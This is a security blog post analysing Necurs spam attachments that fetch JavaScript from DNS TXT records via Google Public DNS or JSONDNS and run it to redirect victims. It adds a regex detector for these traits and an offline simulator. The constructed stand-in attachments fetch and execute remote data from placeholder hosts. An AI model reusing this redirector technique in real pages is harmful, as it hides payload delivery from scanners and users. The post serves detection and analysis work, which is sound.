SpiderLabs Blog

Necurs Spam uses DNS TXT Records for Redirection

Recently we noticed the Necurs botnet launching a small spam campaign with an HTML redirector as an attachment. The HTML is crafted to perform a DNS query against the spammer’s domain, obtain the domain's DNS TXT record and execute the data returned in that record as JavaScript. This leads to redirection to unwanted advertisements and scam webpages. It is the first time we have seen this botnet use this technique.

The emails sent by Necurs had the subject “Delivery <Number>”. The email body is obfuscated using Cyrillic characters.

Figure 1: Trustwave SEG Console displaying the body of the email obfuscated with Cyrillic characters.

The emails have a single attachment named “invoic-<random alphanumeric>.html”. There are two versions of the HTML: one renders the text “Loading…” and sends a query to Google Public DNS, while the other renders nothing and uses JSONDNS for the redirection. Both are analyzed below.

Figure 2: Trustwave SEG Console displaying the first version of the HTML attachment, “invoic-B2448B.html”, which renders the text “Loading…”

Attachment Type 1: Using Google Public DNS

The HTML attachment contains a meta tag and a script tag. The content attribute of the meta tag holds obfuscated JavaScript, which the script tag extracts and executes. That JavaScript performs a DNS query for the spammer’s domain and retrieves its DNS TXT record, a record type intended to carry arbitrary machine-readable text about a domain. The data returned in the TXT record is then executed as JavaScript.

Figure 3: The source code of the HTML attachment “invoic-B2448B.html” with snapshots of its behavior

The HTML “invoic-B2448B.html” shown in Figures 2 and 3 contains a script tag that loads Google’s OAuth 2.0 token-revocation endpoint as a JSONP script. The endpoint wraps its response in a call to whatever callback name the URL supplies, so loading it as a script runs that callback, which in turn executes the obfuscated JavaScript found inside the meta tag.

When the HTML attachment is opened, the script URL hxxp://accounts[.]google[.]com/o/oauth2/revoke?callback=ccc() causes the function “ccc” inside the JavaScript to run. This function first performs a DNS query via Google Public DNS using the decoded URL stored in var v and retrieves the DNS TXT record. It then executes the 0xD entry of the parsed DNS response, which is the TXT record's data field.

In Figure 3, the data entry contains JavaScript that navigates to hxxp://www[.]21732bfg36abp[.]kellogglawassociatesp[.]com/30098.html via window.location.replace. This chain of events ultimately leads to the browser redirecting to an unwanted advertisement webpage.
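The traits laid out above (a script tag whose URL names a JSONP callback, a DNS lookup sent to an HTTP JSON resolver, JavaScript parked in a meta tag, and remote data fed to eval or a redirect) are exactly what an email gateway can look for. As an added example, not code from the original post or from Trustwave, the following Node.js script encodes them as heuristics and runs them over three constructed HTML attachments. The attachment strings, the hostnames jsondns.example, shop.example and txt.spammer.example, and the meta-tag contents are stand-ins, not the campaign's real indicators; the real samples are identified only by the MD5s in the IOC section.

```javascript
"use strict";

// Heuristics for the traits described above. Each rule is one indicator; the
// verdict below requires a DNS-over-HTTP or JSONP fetch combined with a way to
// act on the fetched data, so that no single indicator convicts on its own.
const RULES = [
  // External script whose URL names a callback: the JSONP trick used to run ccc()
  { id: "jsonp-callback-script",
    re: /<script[^>]+src\s*=\s*["'][^"']*[?&]callback=/i },
  // A TXT lookup sent to a DNS-over-HTTP JSON resolver (Google Public DNS or JSONDNS)
  { id: "dns-over-http-txt-query",
    re: /(?:dns\.google(?:\.com)?\/resolve|jsondns)[^"'\s]*type=txt/i },
  // JavaScript parked in a <meta content="..."> attribute rather than a script body
  { id: "js-in-meta-tag",
    re: /<meta[^>]+content\s*=\s*["'][^"']*(?:\bvar\s+\w+\s*=|\bfunction\b[^"']*\(|\beval\s*\()/i },
  // Data of unknown origin handed straight to the JavaScript engine
  { id: "eval-call", re: /\beval\s*\(/i },
  // The client-side redirect primitive both samples rely on
  { id: "location-replace", re: /\blocation\.replace\s*\(/i },
];

// Returns the ids of every rule that matches the attachment text.
function scanAttachment(html) {
  return RULES.filter(r => r.re.test(html)).map(r => r.id);
}

// Suspicious only when the attachment both pulls remote data through a DNS-over-HTTP
// or JSONP channel and has a way to act on it (eval or a redirect).
function verdict(html) {
  const hits = scanAttachment(html);
  const fetchesRemoteData = hits.includes("jsonp-callback-script") ||
                            hits.includes("dns-over-http-txt-query");
  const actsOnData = hits.includes("eval-call") || hits.includes("location-replace");
  return { hits, suspicious: fetchesRemoteData && actsOnData };
}

// Constructed stand-ins (not the real samples): a Type 1 attachment with the
// resolver URL hidden in a meta tag, a Type 2 attachment, and a benign invoice.
const type1 = `<html><head>
<meta name="d" content="var v='base64-of-resolver-url-placeholder';function ccc(){}">
<script src="https://accounts.google.com/o/oauth2/revoke?callback=ccc()"></script>
<script>eval(document.getElementsByTagName('meta')[0].content)</script>
</head><body>Loading...</body></html>`;

const type2 = `<html><head>
<script>function jsonp(json){window.location.replace(json.answer[0].rdata)}</script>
<script src="http://jsondns.example/resolve?name=txt.spammer.example&type=TXT&callback=jsonp"></script>
</head><body></body></html>`;

const benign = `<html><body><p>Invoice 123 is attached.</p>
<a href="https://shop.example/order/123">Track your order</a></body></html>`;

for (const [name, html] of Object.entries({ type1, type2, benign })) {
  console.log(name, verdict(html));
}
```

Note that the Type 1 stand-in is flagged even though its resolver URL is obfuscated, because the JSONP callback script and the eval of meta-tag content are visible in the clear; a scanner that only looks for resolver hostnames would miss it.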

Attachment Type 2: Using open-source JSONDNS

The other type of HTML attachment is simpler and smaller: it uses JSONDNS, an open-source DNS service that answers DNS queries over HTTP and returns the result as JSON.

Figure 4: Trustwave SEG Console displaying the source code of the second version of the HTML attachment, “invoic-9094.html”


In Figure 4, the HTML attachment “invoic-9094.html” performs the DNS query directly from the script tag's src URL, and the DNS TXT record in the response is handed to the JavaScript function jsonp(json).

Figure 5: The DNS TXT Record response using JSONDNS performed by the sample shown in Figure 4


The rdata entry holds a window.location.replace JavaScript command; executing it is the sole purpose of the function jsonp(json).

Figure 6: The JavaScript function of “invoic-9094.html” shown in Figure 4


For this sample, however, the browser never reaches the intended page. window.location.replace occurs twice in the chain: once inside the rdata string and once in jsonp(json), which passes the whole rdata string to it as the URL. The browser therefore tries to navigate to the literal text of the command rather than to the URL contained in it.
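As an added example that is not code from the original post or from Trustwave, the following Node.js script models the TXT-record-to-JavaScript chain of both attachment types offline: the Google Public DNS path of Attachment Type 1 and the JSONDNS path of Attachment Type 2, including the double-replace mistake just described. The two resolver responses are constructed to mirror the shapes the post describes (a Google Public DNS JSON answer with a data field, a JSONDNS answer with an rdata field); the domain txt.spammer.example and the redirect URL are placeholders. The quote-stripping in extractTxtPayload and the exact JSONDNS field layout are assumptions: Google's JSON API returns TXT character-strings with their quote characters kept, so a working redirector has to strip them at some point.

```javascript
"use strict";

// Placeholder payload standing in for the JavaScript carried in the TXT record.
const PAYLOAD = "window.location.replace('http://ads.example/30098.html')";

// Constructed Google Public DNS JSON answer (type 16 = TXT). Google keeps the
// quote characters of each TXT character-string inside the "data" field.
const googleDohResponse = {
  Status: 0, TC: false, RD: true, RA: true, AD: false, CD: false,
  Question: [{ name: "txt.spammer.example.", type: 16 }],
  Answer: [{ name: "txt.spammer.example.", type: 16, TTL: 300, data: `"${PAYLOAD}"` }],
};

// Constructed JSONDNS-style answer (layout assumed): the TXT content sits in "rdata".
const jsonDnsResponse = {
  answer: [{ name: "txt.spammer.example.", type: "TXT", class: "IN", ttl: 300, rdata: PAYLOAD }],
};

// Pull the TXT payload out of either response shape and strip TXT quoting.
// A record split into several character-strings arrives as "\"abc\" \"def\"",
// which is joined back into "abcdef"; an unquoted value is returned as-is.
function extractTxtPayload(resp) {
  const answers = resp.Answer || resp.answer || [];
  const txt = answers.find(a => a.type === 16 || a.type === "TXT");
  if (!txt) return null;
  const raw = txt.data !== undefined ? txt.data : txt.rdata;
  const parts = [...raw.matchAll(/"((?:[^"\\]|\\.)*)"/g)].map(m => m[1]);
  return parts.length ? parts.join("") : raw;
}

// Stand-in for the browser's window object: records redirects instead of
// navigating, so the payload can be observed without leaving the sandbox.
function makeWindowStub() {
  const visited = [];
  return { visited, location: { replace: url => visited.push(String(url)) } };
}

// Type 1: the attachment evaluates the TXT data as code. Running it with the
// stub bound to the name "window" records the URL the spammer intended.
function runType1(resp) {
  const win = makeWindowStub();
  new Function("window", extractTxtPayload(resp))(win);
  return win.visited;
}

// Type 2: jsonp(json) hands the rdata string itself to location.replace, so
// the recorded "URL" is the JavaScript text, not the page inside it. This is
// the double-replace bug that keeps the second sample from reaching its target.
function runType2(json) {
  const win = makeWindowStub();
  const jsonp = j => win.location.replace(j.answer[0].rdata);
  jsonp(json);
  return win.visited;
}

console.log("type 1 redirects to:", runType1(googleDohResponse));
console.log("type 2 redirects to:", runType2(jsonDnsResponse));
```

Run with node: runType1 yields the ad URL, while runType2 records the command text itself, which a real browser would resolve as a relative URL and fail to load. Binding the stub as a Function parameter named window is what makes the eval path observable; in a real attachment the payload runs against the live window object and the redirect happens immediately.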

Conclusion

Necurs still sends out spam campaigns from time to time, although the output from this botnet is now sporadic and small in volume. Though this campaign is low in volume, it is significant because it shows that the people behind the botnet are experimenting. They are now exploring DNS and have used the DNS TXT record to keep the malicious or unwanted URLs out of the email itself, where gateway scanners would otherwise see them. They also tried the open-source JSONDNS service, which supports cross-domain access through a JSONP callback: the response is loaded as a script rather than fetched with XMLHttpRequest, which sidesteps the browser's same-origin policy. The operators may be at an early stage of developing this kind of campaign. The payload of many previous Necurs campaigns was malware, and it would not take much to switch from ‘harmless’ advertising to something more sinister.

While new to Necurs, the DNS TXT record technique itself is not new. For example, the Carbanak campaign we observed in April 2017 also used DNS TXT records to retrieve and execute malware on the compromised system.

IOCs

invoic-B2448B.html  MD5: 78809ebe7b7439cb7b3377284e656258
invoic-9094.html    MD5: 02f16039651a529f1f7eceb53aecd126
